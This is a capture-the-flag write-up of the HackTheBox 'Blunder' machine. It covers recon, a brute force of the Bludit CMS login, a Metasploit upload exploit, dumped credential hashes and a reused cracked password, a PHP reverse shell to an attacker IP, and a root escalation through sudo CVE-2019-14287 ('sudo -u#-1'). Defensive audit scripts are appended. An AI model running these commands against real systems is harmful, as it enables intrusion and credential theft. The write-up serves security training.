Writeup Hackthebox HTB Blunder
0 - Basic info
OS: Linux
IP: 10.10.10.191
1 - Reconnaissance and enumeration
sudo nmap -sS -sV -sC -O 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 22:24 CEST
Nmap scan report for 10.10.10.191
Host is up (0.041s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Ubiquiti AirOS 5.5.9 (90%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%), Linux 3.7 (89%), Netgear RAIDiator 4.2.21 (Linux 2.6.37) (89%)
No exact OS matches for host (test conditions non-ideal).
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.48 seconds
The first scan with Dirbuster shows the admin page /admin, /todo.txt and robots.txt:
http://10.10.10.191/admin/
The admin panel shows BLUDIT. A quick Google search says that Bludit is a blogging CMS.
Nothing useful on robots.txt but inside todo.txt there is interesting info:
10.10.10.191/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
The first user is fergus, and "Update the CMS" is very interesting because it hints at a flaw the site admin already knows about, probably related to outdated software.
So, searching exploits for Bludit:
searchsploit bludit
Bludit - Directory Traversal Image File Upload (Metasploit)
Bludit 3.9.12 - Directory Traversal
bludit Pages Editor 3.0.0 - Arbitrary File Upload
Looking at the page source:
<!-- CSS -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2">
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/admin/themes/booty/css/bludit.css?version=3.9.2">
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/admin/themes/booty/css/bludit.bootstrap.css?version=3.9.2">
The Bludit version is 3.9.2
2 - Vulnerability Identification
Also I found:
https://rastating.github.io/bludit-brute-force-mitigation-bypass/
This post is about how to bypass the CSRF token validation to brute-force Bludit. I can't use Hydra by default, so I need to find something else to brute-force the admin page.
3 - Exploit
Bludit 3.9.2 exploit:
Using the user fergus and brute-forcing with the well-known rockyou.txt wordlist:
python exploit.py 10.10.10.191 fergus /usr/share/wordlists/rockyou.txt
But it did not work.
Testing again with a custom wordlist built with cewl: since this is a blog, it is a great source of information, and maybe the blogger used one of its words as a password.
Custom wordlist
https://tools.kali.org/password-attacks/cewl
cewl -d 2 -m 6 -w docswords.txt 10.10.10.191
And brute-forcing again:
python exploit.py 10.10.10.191 fergus custom.txt
[*] Trying: Plugins
[*] Trying: Include
[*] Trying: service
[*] Trying: Stadia
[*] Trying: Dynamic
[*] Trying: blunder
[*] Trying: interesting
[*] Trying: devices
[*] Trying: Google
[*] Trying: content
[*] Trying: created
[*] Trying: Creation
[*] Trying: November
[*] Trying: Reading
[*] Trying: minute
[*] Trying: Awards
[*] Trying: Fantasy
[*] Trying: National
[*] Trying: players
[*] Trying: allows
[*] Trying: stream
[*] Trying: description
[*] Trying: Favicon
[*] Trying: Bootstrap
[*] Trying: bootstrap
[*] Trying: Styles
[*] Trying: Robots
[*] Trying: plugin
[*] Trying: Navbar
[*] Trying: Static
[*] Trying: Social
[*] Trying: Networks
[*] Trying: Content
[*] Trying: Stephen
[*] Trying: Sidebar
[*] Trying: nothing
[*] Trying: Footer
[*] Trying: Copyright
[*] Trying: Powered
[*] Trying: byEgotisticalSW
[*] Trying: Javascript
[*] Trying: American
[*] Trying: fiction
[*] Trying: novels
[*] Trying: feature
[*] Trying: series
[*] Trying: published
[*] Trying: received
[*] Trying: awarded
[*] Trying: literature
[*] Trying: centers
[*] Trying: through
[*] Trying: smartphones
[*] Trying: tablets
[*] Trying: library
[*] Trying: Breaked
[*] Trying: button
[*] Trying: September
[*] Trying: author
[*] Trying: horror
[*] Trying: supernatural
[*] Trying: suspense
[*] Trying: fantasy
[*] Trying: million
[*] Trying: copies
[*] Trying: adapted
[*] Trying: miniseries
[*] Trying: television
[*] Trying: including
[*] Trying: Richard
[*] Trying: Bachman
[*] Trying: written
[*] Trying: approximately
[*] Trying: stories
[*] Trying: collections
[*] Trying: Stoker
[*] Trying: British
[*] Trying: Society
[*] Trying: Foundation
[*] Trying: Distinguished
[*] Trying: Contribution
[*] Trying: Letters
[*] Trying: probably
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain
SUCCESS: Password found!
Use fergus:RolandDeschain to login.
Great, the password is RolandDeschain and I can log in to the admin panel.
Metasploit
Now I can use one of the previous exploits. This time I used Metasploit:
linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.5:8443
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading zcoxmsbSZa.png...
[*] Uploading .htaccess...
[*] Executing zcoxmsbSZa.png...
[*] Command shell session 1 opened (10.10.14.5:8443 -> 10.10.10.191:39706) at 2020-07-29 20:18:58 +0200
[+] Deleted .htaccess
pwd
/var/www/bludit-3.9.2/bl-content/tmp
Good, shell access. I am not able to get any user flag, so I need to gain user access.
User hashes
Enumerating the blog source code, I found:
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Admin",
"firstName": "Administrator",
"lastName": "",
"role": "admin",
"password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
"salt": "5dde2887e7aca",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""
},
"fergus": {
"firstName": "",
"lastName": "",
"nickname": "",
"description": "",
"role": "author",
"password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
"salt": "jqxpjfnv",
"email": "",
"registered": "2019-11-27 13:26:44",
"tokenRemember": "",
"tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"codepen": "",
"instagram": "",
"github": "",
"gitlab": "",
"linkedin": "",
"mastodon": ""
}
}
Identifying the hashes
Two users with hashes.
Using hash-identifier to identify the hashes:
hash-identifier bfcc887f62e36ea019e3295aafb8a3885966e265
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
Least Possible Hashs:
[+] Tiger-160
[+] Haval-160
[+] RipeMD-160
[+] SHA-1(HMAC)
[+] Tiger-160(HMAC)
[+] RipeMD-160(HMAC)
[+] Haval-160(HMAC)
[+] SHA-1(MaNGOS)
[+] SHA-1(MaNGOS2)
[+] sha1($pass.$salt)
[+] sha1($salt.$pass)
[+] sha1($salt.md5($pass))
[+] sha1($salt.md5($pass).$salt)
[+] sha1($salt.sha1($pass))
[+] sha1($salt.sha1($salt.sha1($pass)))
[+] sha1($username.$pass)
[+] sha1($username.$pass.$salt)
[+] sha1(md5($pass))
[+] sha1(md5($pass).$salt)
[+] sha1(md5(sha1($pass)))
[+] sha1(sha1($pass))
[+] sha1(sha1($pass).$salt)
[+] sha1(sha1($pass).substr($pass,0,3))
[+] sha1(sha1($salt.$pass))
[+] sha1(sha1(sha1($pass)))
[+] sha1(strtolower($username).$pass)
--------------------------------------------------
HASH: exit
Not Found.
--------------------------------------------------
But I could not crack the hash or find it on any hash-cracking website.
Hash #2
Enumerating again, I found another version (3.10.0a) of Bludit with another user and password configuration file:
/var/bludit/3.10.0a/bl-content/databases/users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
New user Hugo with a password hash. This time I was lucky and the password had already been cracked:
Password120
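A check for the two users.php layouts above, as an added example that is not part of the original writeup: it parses the PHP-guarded JSON, flags records stored without a salt (the 3.10.0a record for Hugo), and, given a candidate password, reports which SHA-1 construction a record uses. It assumes Bludit 3.x computes sha1(password . salt), so both orderings are tried; the sample data is constructed from the records shown above.

```python
import hashlib
import json

# Constructed excerpt shaped like Bludit's bl-content/databases/users.php:
# a PHP guard line followed by a JSON object keyed by username. The salted
# records mirror the 3.9.2 file above; "hugo" mirrors the 3.10.0a record
# (keyed "admin" there, nickname Hugo), which stores the hash without a salt.
SAMPLE_USERS_PHP = """<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
  "admin":  {"role": "admin", "salt": "5dde2887e7aca",
             "password": "bfcc887f62e36ea019e3295aafb8a3885966e265"},
  "fergus": {"role": "author", "salt": "jqxpjfnv",
             "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7"},
  "hugo":   {"role": "User",
             "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d"}
}
"""

def parse_users_php(text):
    """Drop the '<?php ... ?>' guard line and decode the JSON body."""
    body = text.split("?>", 1)[1]
    return json.loads(body)

def sha1_hex(s):
    return hashlib.sha1(s.encode()).hexdigest()

def unsalted_accounts(users):
    """Usernames whose stored hash has no salt: a plain sha1(password),
    which any precomputed lookup table resolves instantly."""
    return sorted(u for u, rec in users.items() if not rec.get("salt"))

def match_scheme(record, candidate):
    """Return the SHA-1 construction that turns `candidate` into the stored
    hash, or None. Assumption: Bludit 3.x uses sha1(password . salt)."""
    salt = record.get("salt", "")
    if not salt:
        schemes = {"sha1(pass)": sha1_hex(candidate)}
    else:
        schemes = {"sha1(pass.salt)": sha1_hex(candidate + salt),
                   "sha1(salt.pass)": sha1_hex(salt + candidate)}
    for name, digest in schemes.items():
        if digest == record["password"].lower():
            return name
    return None

if __name__ == "__main__":
    users = parse_users_php(SAMPLE_USERS_PHP)
    print("records without salt:", unsalted_accounts(users))
    print("fergus scheme:", match_scheme(users["fergus"], "RolandDeschain"))
```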
Another reverse shell ?
Great, I tried to use the user Hugo but my shell sucked and was unstable…
So I started another reverse shell:
nc -lvp 8888
php -r '$sock=fsockopen("10.10.14.5",8888);exec("/bin/sh -i <&3 >&3 2>&3");'
And upgraded the shell with Python:
python3 -c "import pty;pty.spawn('/bin/bash')"
User shell and flag
Now I can log in as Hugo:
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ su - hugo
Password: Password120
hugo@blunder:~$ ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
hugo@blunder:~$ cat user.txt
e0f8[...]d3a5
4 - Post-Exploitation and privilege escalation
This part is about how to get root as Hugo.
I started checking the sudo permissions:
hugo@blunder:/$ sudo -l
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
CVE-2019-14287 sudo
I immediately recognised the flaw and its CVE, for sudo 1.8.27:
https://access.redhat.com/security/cve/cve-2019-14287
This CVE was very famous because it affected a huge number of Linux distributions and is trivial to exploit: sudo did not handle the target user ID properly when given an invalid ID such as -1. It only applies, though, when the sudoers file contains a rule like this:
(ALL, !root) /usr/bin/somecommand
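An audit of the rule shape above, as an added example that is not part of the original writeup: it parses `sudo -l` output (a constructed sample mirroring the hugo rule), flags runas lists that grant ALL but exclude root, and combines that with the sudo version, since CVE-2019-14287 was fixed in 1.8.28. On the defending side the remedy is to upgrade sudo and to list the permitted target users explicitly instead of ALL with an exclusion.

```python
import re

# Constructed sample of `sudo -l` output, mirroring the rule shown above
# plus one harmless rule so the filter has something to ignore.
SAMPLE_SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
    (www-data) /usr/bin/php
"""

# A rule line looks like "(runas users[: runas groups]) command".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<cmd>\S.*)$")

def parse_version(s):
    """'Sudo version 1.8.27p1' -> (1, 8, 27); take sudo -V's first line."""
    return tuple(int(x) for x in re.findall(r"\d+", s)[:3])

def risky_runas_rules(sudo_l_output):
    """Rules that allow ALL target users but exclude root (or uid 0): the
    shape CVE-2019-14287 turns into root execution on sudo < 1.8.28."""
    hits = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        # Only the user part matters; anything after ':' is the group list.
        runas_users = m.group("runas").split(":")[0]
        entries = [e.strip() for e in runas_users.split(",")]
        excludes_root = any(e in ("!root", "!#0") for e in entries)
        if "ALL" in entries and excludes_root:
            hits.append((m.group("runas"), m.group("cmd")))
    return hits

def vulnerable_to_cve_2019_14287(sudo_version, sudo_l_output):
    """True only when both conditions hold: old sudo and a risky rule."""
    return parse_version(sudo_version) < (1, 8, 28) and bool(
        risky_runas_rules(sudo_l_output))

if __name__ == "__main__":
    for runas, cmd in risky_runas_rules(SAMPLE_SUDO_L):
        print(f"risky rule: ({runas}) {cmd}")
    print("vulnerable on 1.8.27:",
          vulnerable_to_cve_2019_14287("1.8.27", SAMPLE_SUDO_L))
```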
Root shell and flag
Great, because this time it means I can use the ID -1 to execute /bin/bash as root:
hugo@blunder:/$ sudo -u#-1 /bin/bash
root@blunder:/# cat /root/root.txt
bcb[...]7d1
Thanks for reading!